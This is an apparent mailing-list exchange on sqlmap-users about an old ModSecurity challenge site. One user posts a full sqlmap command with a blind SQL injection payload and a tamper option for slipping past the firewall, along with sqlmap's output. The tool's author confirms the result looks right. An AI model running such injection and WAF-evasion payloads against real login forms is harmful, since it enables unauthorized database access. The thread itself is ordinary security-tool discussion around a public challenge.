Re: [sqlmap-users] Old modsecurity challange

Sat, 01 Jun 2013 04:49:00 -0700 

Hi Marcell.

And what makes you think that you are not getting right results? There
results you've sent look quite right.

Kind regards,
Miroslav Stampar


On Fri, May 31, 2013 at 10:34 AM, Marcell Fodor <fodor.em...@gmail.com>wrote:

> Heya,
>
> I had some time to play arround with and old medsecurity challange here:
> http://www.modsecurity.org/zero.webappsecurity.com/
>
> I did make this work under sqlmap:
>
> python ./sqlmap.py -u "
> http://www.modsecurity.org/zero.webappsecurity.com/login1.asp"; --data
> "login=asd'and(1)like(DateValue(iif(1=1*,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum"
> --string "Object moved" --technique "b" --dbms "msaccess" --tamper
> "space2randomblank" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64;
> rv:21.0) Gecko/20100101 Firefox/21.0"
>
> I had to remove %0C from space2randomblank to make this work.
>
> Response:
>
> Place: (custom) POST
> Parameter: #1*
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: login=asd'and(1)like(DateValue(iif(1=1 AND
> 5276=5276,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum
> --
>
> Is the challange way outdated or something I do wrong?
>
> M
>
>
>
>
> ------------------------------------------------------------------------------
> Get 100% visibility into Java/.NET code with AppDynamics Lite
> It's a free troubleshooting tool designed for production
> Get down to code-level detail for bottlenecks, with <2% overhead.
> Download for free and get started troubleshooting in minutes.
> http://p.sf.net/sfu/appdyn_d2d_ap2
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
Get 100% visibility into Java/.NET code with AppDynamics Lite
It's a free troubleshooting tool designed for production
Get down to code-level detail for bottlenecks, with <2% overhead.
Download for free and get started troubleshooting in minutes.
http://p.sf.net/sfu/appdyn_d2d_ap2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to